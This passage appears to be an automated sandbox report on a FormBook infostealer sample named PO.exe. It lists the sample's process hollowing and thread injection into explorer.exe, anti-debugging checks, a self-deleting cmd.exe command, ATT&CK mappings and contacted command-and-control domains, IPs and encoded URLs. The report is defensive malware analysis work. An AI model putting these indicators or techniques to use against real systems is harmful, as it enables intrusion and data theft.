          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D78A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CC3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D5FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CCDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D5D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D6138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\explorer.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.cwyxonlp.icu
          Source: C:\Windows\explorer.exeDomain query: www.phorice.com
          Source: C:\Windows\explorer.exeDomain query: www.websiteworlda-z.com
          Source: C:\Windows\explorer.exeNetwork Connect: 44.227.76.166 80
          Source: C:\Windows\explorer.exeNetwork Connect: 194.117.254.63 80
          Contains functionality to prevent local Windows debuggingShow sources
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_73351000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\PO.exeSection loaded: unknown target: C:\Users\user\Desktop\PO.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO.exeThread register set: target process: 3472
          Source: C:\Users\user\Desktop\PO.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\explorer.exeThread register set: target process: 3472
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\PO.exeSection unmapped: C:\Windows\SysWOW64\explorer.exe base address: 900000
          Source: C:\Users\user\Desktop\PO.exeProcess created: C:\Users\user\Desktop\PO.exe 'C:\Users\user\Desktop\PO.exe'
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO.exe'
          Source: PO.exe, 00000001.00000002.294032142.00000000028B0000.00000040.00000001.sdmp, explorer.exe, 00000003.00000002.511285209.0000000005EA0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000002.500716588.00000000033C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.498099374.0000000001640000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000002.500716588.00000000033C0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.498099374.0000000001640000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000002.500716588.00000000033C0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: PO.exe, 00000001.00000002.294032142.00000000028B0000.00000040.00000001.sdmpBinary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
          Source: explorer.exe, 00000003.00000002.497174313.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000003.00000002.498099374.0000000001640000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000002.500716588.00000000033C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000003.00000002.498099374.0000000001640000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000002.500716588.00000000033C0000.00000002.00000001.sdmpBinary or memory string: Progmanlock

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery241Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection612Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing11Cached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 383905 Sample: PO.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Multi AV Scanner detection for dropped file 2->40 42 4 other signatures 2->42 10 PO.exe 18 2->10         started        process3 file4 28 C:\Users\user\AppData\Local\...\5t94xwjj.dll, PE32 10->28 dropped 52 Detected unpacking (changes PE section rights) 10->52 54 Maps a DLL or memory area into another process 10->54 56 Tries to detect virtualization through RDTSC time measurements 10->56 58 Contains functionality to prevent local Windows debugging 10->58 14 PO.exe 10->14         started        signatures5 process6 signatures7 60 Modifies the context of a thread in another process (thread injection) 14->60 62 Maps a DLL or memory area into another process 14->62 64 Sample uses process hollowing technique 14->64 66 Queues an APC in another process (thread injection) 14->66 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.websiteworlda-z.com 194.117.254.63, 49693, 80 UDMEDIA-ASDE Germany 17->30 32 www.phorice.com 17->32 34 2 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 explorer.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PO.exe17%ReversingLabsWin32.Spyware.Noon

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll10%ReversingLabsWin32.PUA.Wacapew

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          10.2.explorer.exe.51af834.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.2.PO.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          10.2.explorer.exe.900000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          0.2.PO.exe.2670000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.1.PO.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.PO.exe.28b0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          www.c-voyageinc.com/r4ei/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://phorice.com0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.phorice.com/r4ei/?_ZA0p2=qFx0jq35EoqhqGMmxZfRcaIhnrtQSZTAjbNVWKcVQ7fc4zdL4G4zojbsIieSdo+D23N6&GzuLH=VBZLTBc0f0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.websiteworlda-z.com/r4ei/?_ZA0p2=cRhAr0dy1lG+6v8jj0sxWagS9ZGCZip2Fr4SFXT7OXMmHzjmweO35OAl28FoqWQGc0rZ&GzuLH=VBZLTBc0f0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.websiteworlda-z.com
          		194.117.254.63
          		truetrue
            		unknown
            pixie.porkbun.com
            		44.227.76.166
            		truefalse
              		high
              www.cwyxonlp.icu
              		unknown
              		unknowntrue
                		unknown
                www.phorice.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  www.c-voyageinc.com/r4ei/true
                  • Avira URL Cloud: safe
                  		low
                  http://www.phorice.com/r4ei/?_ZA0p2=qFx0jq35EoqhqGMmxZfRcaIhnrtQSZTAjbNVWKcVQ7fc4zdL4G4zojbsIieSdo+D23N6&GzuLH=VBZLTBc0ftrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.websiteworlda-z.com/r4ei/?_ZA0p2=cRhAr0dy1lG+6v8jj0sxWagS9ZGCZip2Fr4SFXT7OXMmHzjmweO35OAl28FoqWQGc0rZ&GzuLH=VBZLTBc0ftrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.comexplorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpfalse
                      		high
                      http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpfalse
                          		high
                          http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://phorice.comexplorer.exe, 0000000A.00000002.504257510.000000000569F000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpfalse
                            		high
                            http://www.tiro.comexplorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpfalse
                              		high
                              http://www.goodfont.co.krexplorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.comlexplorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.typography.netDexplorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpfalse
                                		high
                                http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://fontfabrik.comexplorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.fonts.comexplorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.sandoll.co.krexplorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.sakkal.comexplorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown

                                      Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public

                                      IPDomainCountryFlagASNASN NameMalicious
                                      194.117.254.63
                                      		www.websiteworlda-z.comGermany
                                      		199753UDMEDIA-ASDEtrue
                                      44.227.76.166
                                      		pixie.porkbun.comUnited States
                                      		16509AMAZON-02USfalse

                                      General Information

                                      Joe Sandbox Version:31.0.0 Emerald
                                      Analysis ID:383905
                                      Start date:08.04.2021
                                      Start time:12:07:37
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 9m 58s
                                      Hypervisor based Inspection enabled:false
                                      Report type:light
                                      Sample file name:PO.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:15
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:1
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@7/3@3/2
                                      EGA Information:Failed
                                      HDC Information:
                                      • Successful, ratio: 24.5% (good quality ratio 22.1%)
                                      • Quality average: 74.4%
                                      • Quality standard deviation: 31.5%
                                      HCA Information:
                                      • Successful, ratio: 89%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .exe
                                      Warnings:
                                      Show All
                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 93.184.220.29, 104.43.193.48, 95.100.54.203, 104.43.139.144, 13.64.90.137
                                      • Excluded domains from analysis (whitelisted): www.bing.com, skypedataprdcolwus17.cloudapp.net, cs9.wac.phicdn.net, fs.microsoft.com, dual-a-0001.a-msedge.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, skypedataprdcolcus15.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, blobcollector.events.data.trafficmanager.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net
                                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/383905/sample/PO.exe

                                      Simulations

                                      Behavior and APIs

                                      No simulations

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      44.227.76.166comprobante de pago bancario.exeGet hashmaliciousBrowse
